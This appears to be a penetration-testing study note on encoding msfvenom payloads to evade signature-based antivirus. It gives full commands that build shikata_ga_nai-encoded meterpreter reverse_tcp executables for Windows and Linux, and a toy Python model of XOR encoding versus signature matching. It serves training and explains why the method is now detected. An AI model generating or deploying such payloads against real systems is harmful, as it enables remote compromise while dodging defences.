Encoding Payloads
Signature-based antivirus solutions detect malicious files and executables by matching known byte patterns. Older AV engines can be evaded by encoding the payload so that those patterns no longer appear in the file.
❗ This attack vector is outdated and rarely effective today: modern AV/EDR engines recognise the stock msfvenom executable template and the encoder's decoder stub, so encoding on its own does not hide the payload.
It may still work against legacy systems such as Windows 7 or older running outdated AV.
🗒️ Payload encoding transforms the bytes of the shellcode and prepends a small decoder stub that restores them at run time, so the payload's static signature changes while its behaviour stays the same.
🗒️ Shellcode is the code typically used as the payload of an exploit; it provides a remote command shell on the target system.
List the available encoders (the output includes a rank for each):
msfvenom --list encoders

Encoders that msfvenom ranks as excellent include:
cmd/powershell_base64
x86/shikata_ga_nai
Note that x86/shikata_ga_nai is an x86 encoder: it applies to x86 payloads (Windows or Linux), not to x64 ones.
#Windows Payload
Generate a Windows x86 payload and encode it with shikata_ga_nai:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.128 LPORT=1234 -e x86/shikata_ga_nai -f exe > /home/kali/certs/ejpt/Windows_Payloads/encodedx86.exe

The encoding pass can be repeated as many times as desired with the -i option, which sets the number of iterations. Each iteration re-encodes the already encoded payload and adds another decoder stub, so the stored bytes change further at the cost of a slightly larger file. More iterations can help against simple byte-pattern matching, but offer diminishing returns: an engine that recognises the decoder stub catches the payload whatever the iteration count.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.128 LPORT=1234 -i 10 -e x86/shikata_ga_nai -f exe > /home/kali/certs/ejpt/Windows_Payloads/encodedx86.exe
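To make concrete what the encoding described above changes and what the -i iterations add, here is an added Python model of the idea behind shikata_ga_nai. It is not msfvenom's or Metasploit's code and produces no real machine code: it implements an XOR encoder with additive feedback, the matching decoder, a fixed placeholder decoder stub, and a naive substring signature check. The shellcode bytes, the stub marker and the signatures are constructed for the illustration.

```python
"""Toy model of payload encoding versus static signature matching.

Added illustration, not msfvenom's code. Mimics the idea behind
x86/shikata_ga_nai (polymorphic XOR with additive feedback) on
constructed stand-in bytes; it does not produce executable machine code.
"""
import hashlib
import os

# Constructed stand-in for shellcode: plain byte values, not real instructions.
SAMPLE_SHELLCODE = bytes(range(0x10, 0x30))

# A "signature" an AV engine might hold for the raw payload: its first 6 bytes.
RAW_SIGNATURE = SAMPLE_SHELLCODE[:6]

# Constructed stand-in for the decoder stub a real encoder prepends. In
# shikata_ga_nai this is a short x86 loop; here it is a fixed 4-byte marker.
DECODER_STUB = b"\xde\xc0\xde\x00"


def xor_feedback_encode(data: bytes, key: int) -> bytes:
    """XOR each byte with a running key, then advance the key by the plaintext
    byte, so the key differs at every position (unlike plain XOR)."""
    out = bytearray()
    k = key
    for p in data:
        out.append(p ^ k)
        k = (k + p) & 0xFF
    return bytes(out)


def xor_feedback_decode(data: bytes, key: int) -> bytes:
    """Inverse of xor_feedback_encode: recover the plaintext byte, then advance
    the key by that recovered byte, exactly as the encoder did."""
    out = bytearray()
    k = key
    for c in data:
        p = c ^ k
        out.append(p)
        k = (k + p) & 0xFF
    return bytes(out)


def encode_payload(shellcode: bytes, keys: list[int]) -> bytes:
    """One encoding pass per key (len(keys) plays the role of -i N).
    Each pass wraps the current blob as DECODER_STUB + key byte + encoded
    bytes, so pass N also encodes the stub and key left by pass N-1."""
    blob = shellcode
    for key in keys:
        blob = DECODER_STUB + bytes([key]) + xor_feedback_encode(blob, key)
    return blob


def decode_payload(blob: bytes, iterations: int) -> bytes:
    """Peel the layers in reverse order, as the stubs would at run time."""
    for _ in range(iterations):
        if not blob.startswith(DECODER_STUB):
            raise ValueError("missing decoder stub")
        key = blob[len(DECODER_STUB)]
        blob = xor_feedback_decode(blob[len(DECODER_STUB) + 1:], key)
    return blob


def random_keys(iterations: int) -> list[int]:
    """Fresh random key per pass: the same payload encodes differently each run."""
    return list(os.urandom(iterations))


def matches_signature(blob: bytes, signature: bytes) -> bool:
    """The simplest possible signature engine: a byte-pattern substring search."""
    return signature in blob


def sha256(blob: bytes) -> str:
    return hashlib.sha256(blob).hexdigest()


def summary(shellcode: bytes, iterations: int) -> dict:
    """Check a raw-bytes signature and a decoder-stub signature against the raw
    and encoded payloads, and confirm the encoding round-trips."""
    keys = random_keys(iterations)
    encoded = encode_payload(shellcode, keys)
    return {
        "iterations": iterations,
        "size_growth": len(encoded) - len(shellcode),
        "raw_sig_hits_raw": matches_signature(shellcode, RAW_SIGNATURE),
        "raw_sig_hits_encoded": matches_signature(encoded, RAW_SIGNATURE),
        "stub_sig_hits_encoded": matches_signature(encoded, DECODER_STUB),
        "round_trip_ok": decode_payload(encoded, iterations) == shellcode,
        "encoded_sha256": sha256(encoded),
    }


if __name__ == "__main__":
    for n in (1, 5, 10):
        print(summary(SAMPLE_SHELLCODE, n))
```

Three things stand out when it runs: the signature on the raw bytes stops matching after a single pass, every run produces a different hash because the keys are random, yet the signature on the decoder stub hits every variant no matter how many iterations are used. That is the reason encoding alone no longer evades an engine that knows the stub.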

#Linux Payload
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.31.128 LPORT=1234 -i 10 -e x86/shikata_ga_nai -f elf > /home/kali/certs/ejpt/Linux_Payloads/encodedx86
